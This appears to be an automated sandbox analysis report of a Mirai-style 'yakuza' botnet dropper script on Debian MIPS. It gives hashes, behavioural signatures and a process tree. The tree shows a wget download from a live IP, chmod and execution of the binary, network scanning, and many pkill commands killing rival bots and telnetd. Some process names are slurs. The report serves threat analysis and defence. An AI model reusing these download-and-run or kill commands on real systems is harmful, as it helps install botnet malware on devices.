Analysis
-
max time kernel
123s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
13-11-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
-
Size
1KB
-
MD5
06e945470e277d1953b8348f96d6bdab
-
SHA1
97c9f6a0ac42ab524a999911fb340a9201eb7f77
-
SHA256
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1
-
SHA512
9296c41fdc556cee147ab81f052d487dcbe9f8ea8227896e3f389f14bebeeaf6b440fb677b3ea33c629430127b4eedf4776bb0576d14c758afd481ee007307ab
Malware Config
Signatures
-
Contacts a large (60292) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 811 chmod 890 chmod 911 chmod 949 chmod 968 chmod 739 chmod 751 chmod 782 chmod 982 chmod 1002 chmod 724 chmod 859 chmod 876 chmod -
Executes dropped EXE 1 IoCs
Processes:
yakuza.mipsioc pid Process /tmp/yakuza.mips 726 yakuza.mips -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
pkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkilldescription ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Processes:
pkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkilldescription ioc Process File opened for reading /proc/84/cmdline pkill File opened for reading /proc/14/cmdline pkill File opened for reading /proc/743/status pkill File opened for reading /proc/81/status pkill File opened for reading /proc/376/cmdline pkill File opened for reading /proc/5/cmdline pkill File opened for reading /proc/171/cmdline pkill File opened for reading /proc/171/status pkill File opened for reading /proc/22/status pkill File opened for reading /proc/119/cmdline pkill File opened for reading /proc/699/cmdline pkill File opened for reading /proc/37/cmdline pkill File opened for reading /proc/9/status pkill File opened for reading /proc/743/status pkill File opened for reading /proc/23/status pkill File opened for reading /proc/355/cmdline pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/702/cmdline pkill File opened for reading /proc/119/cmdline pkill File opened for reading /proc/77/cmdline pkill File opened for reading /proc/73/cmdline pkill File opened for reading /proc/729/cmdline pkill File opened for reading /proc/727/cmdline pkill File opened for reading /proc/37/cmdline pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/674/status pkill File opened for reading /proc/12/cmdline pkill File opened for reading /proc/356/status pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/119/status pkill File opened for reading /proc/84/status pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/355/cmdline pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/82/status pkill File opened for reading /proc/917/status pkill File opened for reading /proc/326/cmdline pkill File opened for reading /proc/13/status pkill File opened for reading /proc/120/cmdline pkill File opened for reading /proc/783/status pkill File opened for reading /proc/75/status pkill File opened for reading /proc/148/status pkill File opened for reading /proc/18/status pkill File opened for reading /proc/75/cmdline pkill File opened for reading /proc/674/cmdline pkill File opened for reading /proc/171/cmdline pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/668/cmdline pkill File opened for reading /proc/73/status pkill File opened for reading /proc/78/cmdline pkill File opened for reading /proc/78/cmdline pkill File opened for reading /proc/679/status pkill File opened for reading /proc/75/status pkill File opened for reading /proc/844/status pkill File opened for reading /proc/filesystems pkill File opened for reading /proc/673/status pkill File opened for reading /proc/18/cmdline pkill File opened for reading /proc/326/cmdline pkill File opened for reading /proc/700/status pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/84/status pkill File opened for reading /proc/77/status pkill File opened for reading /proc/filesystems pkill File opened for reading /proc/7/cmdline pkill -
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
yakuza.mipswgetshbusyboxwgetrmyakuza.mipselrmpkillpid Process 726 yakuza.mips 732 wget 1099 sh 1101 busybox 706 wget 728 rm 741 yakuza.mipsel 745 rm 1100 pkill -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc Process File opened for modification /tmp/yakuza.mipsel wget File opened for modification /tmp/yakuza.x86 wget File opened for modification /tmp/yakuza.arm6 wget File opened for modification /tmp/yakuza.ppc wget File opened for modification /tmp/yakuza.m68k wget File opened for modification /tmp/yakuza.arm5 wget File opened for modification /tmp/yakuza.arm7 wget File opened for modification /tmp/yakuza.sparc wget File opened for modification /tmp/yakuza.mips wget File opened for modification /tmp/yakuza.sh wget File opened for modification /tmp/yakuza.i686 wget File opened for modification /tmp/yakuza.i586 wget File opened for modification /tmp/yakuza.arm4 wget
Processes
-
/tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh/tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh1⤵PID:702
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:706
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:726 -
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:731
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads CPU attributes
- Reads runtime system information
PID:733
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:735
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:744
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵PID:746
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:748
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵PID:749
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵
- Reads CPU attributes
PID:750
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:754
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵PID:757
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads CPU attributes
PID:758
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:759
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵PID:760
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵
- Reads CPU attributes
- Reads runtime system information
PID:761
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:762
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:763
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:764
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:766
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:767
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
- Reads runtime system information
PID:768
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:769
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵PID:770
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵
- Reads CPU attributes
PID:771
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:772
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵PID:773
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵
- Reads CPU attributes
PID:774
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:775
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:776
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads CPU attributes
- Reads runtime system information
PID:777
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:778
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:779
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads CPU attributes
PID:780
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:781
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵PID:783
-
/usr/bin/pkillpkill -9 fdevalvex4⤵
- Reads CPU attributes
- Reads runtime system information
PID:785
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:790
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵PID:791
-
/usr/bin/pkillpkill -9 scanspc4⤵
- Reads CPU attributes
- Reads runtime system information
PID:792
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:793
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵PID:798
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵
- Reads CPU attributes
- Reads runtime system information
PID:799
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:802
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵PID:809
-
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads CPU attributes
PID:810
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:812
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵PID:822
-
/usr/bin/pkillpkill -9 scanx864⤵
- Reads CPU attributes
- Reads runtime system information
PID:823
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:828
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:836
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads CPU attributes
- Reads runtime system information
PID:837
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:839
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:850
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads runtime system information
PID:852
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:854
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:863
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵
- Reads CPU attributes
- Reads runtime system information
PID:865
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:868
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:870
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵
- Reads CPU attributes
- Reads runtime system information
PID:871
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:872
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:873
-
/usr/bin/pkillpkill -9 freecookiex864⤵
- Reads CPU attributes
- Reads runtime system information
PID:874
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:875
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵PID:881
-
/usr/bin/pkillpkill -9 sysgpu4⤵
- Reads CPU attributes
PID:882
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:883
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:884
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:885
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:886
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:887
-
/usr/bin/pkillpkill -9 frgege4⤵
- Reads CPU attributes
- Reads runtime system information
PID:888
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:889
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵PID:894
-
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads runtime system information
PID:895
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:897
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵PID:898
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:899
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:900
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵PID:901
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads runtime system information
PID:902
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:903
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵PID:906
-
/usr/bin/pkillpkill -9 frgreu4⤵
- Reads CPU attributes
PID:907
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:909
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:918
-
/usr/bin/pkillpkill -9 telnetd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:920
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:922
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:929
-
/usr/bin/pkillpkill -9 0x766f69644⤵
- Reads CPU attributes
- Reads runtime system information
PID:930
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:932
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:939
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
- Reads CPU attributes
PID:941
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:942
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵PID:950
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
PID:953
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:957
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵PID:959
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵
- Reads runtime system information
PID:960
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:961
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:962
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads CPU attributes
- Reads runtime system information
PID:963
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:964
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵PID:965
-
/usr/bin/pkillpkill -9 OaF34⤵
- Reads CPU attributes
- Reads runtime system information
PID:966
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:967
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:973
-
/usr/bin/pkillpkill -9 geae4⤵
- Reads CPU attributes
- Reads runtime system information
PID:974
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:975
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:976
-
/usr/bin/pkillpkill -9 vaiolmao4⤵
- Reads CPU attributes
PID:977
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:978
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵PID:979
-
/usr/bin/pkillpkill -9 123123a4⤵
- Reads CPU attributes
PID:980
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵PID:981
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵PID:987
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵
- Reads CPU attributes
- Reads runtime system information
PID:988
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:989
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵PID:990
-
/usr/bin/pkillpkill -9 ggTrex4⤵
- Reads CPU attributes
- Reads runtime system information
PID:991
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:992
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵PID:993
-
/usr/bin/pkillpkill -9 wasads4⤵
- Reads CPU attributes
- Reads runtime system information
PID:994
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:995
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:996
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵
- Reads runtime system information
PID:997
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:998
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:999
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵
- Reads CPU attributes
PID:1000
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1001
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵PID:1006
-
/usr/bin/pkillpkill -9 ggt4⤵PID:1007
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1008
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵PID:1009
-
/usr/bin/pkillpkill -9 wget-log4⤵
- Reads runtime system information
PID:1010
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1011
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵PID:1012
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1013
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1014
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1015
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵PID:1016
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1017
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵PID:1018
-
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1019
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1020
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵PID:1021
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵PID:1022
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1023
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵PID:1024
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1025
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1026
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵PID:1027
-
/usr/bin/pkillpkill -9 ggtr4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1028
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1029
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1030
-
/usr/bin/pkillpkill -9 14Fa4⤵
- Reads runtime system information
PID:1031
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1032
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵PID:1033
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵
- Reads CPU attributes
PID:1034
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1035
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1036
-
/usr/bin/pkillpkill -9 ggtt4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1037
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1038
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵PID:1039
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵
- Reads runtime system information
PID:1040
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1041
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1042
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
PID:1043
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1044
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵PID:1045
-
/usr/bin/pkillpkill -9 haetrghbr4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1046
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1047
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1048
-
/usr/bin/pkillpkill -9 19ju3d4⤵PID:1049
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1050
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵PID:1051
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵
- Reads CPU attributes
PID:1052
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1053
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵PID:1054
-
/usr/bin/pkillpkill -9 hehahejeje924⤵PID:1055
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1056
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1057
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵PID:1058
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1059
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1060
-
/usr/bin/pkillpkill -9 SlaVLav124⤵
- Reads CPU attributes
- Reads runtime system information
PID:1061
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1062
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1063
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1064
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1065
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1066
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads CPU attributes
PID:1067
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1068
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵PID:1069
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1070
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1071
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵PID:1072
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1073
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1074
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵PID:1075
-
/usr/bin/pkillpkill -9 5Gbf4⤵PID:1076
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1077
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵PID:1078
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵
- Reads CPU attributes
PID:1079
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1080
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵PID:1081
-
/usr/bin/pkillpkill -9 iaGv4⤵
- Reads CPU attributes
PID:1082
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1083
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵PID:1084
-
/usr/bin/pkillpkill -9 5aA34⤵
- Reads CPU attributes
PID:1085
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1086
-
-
-
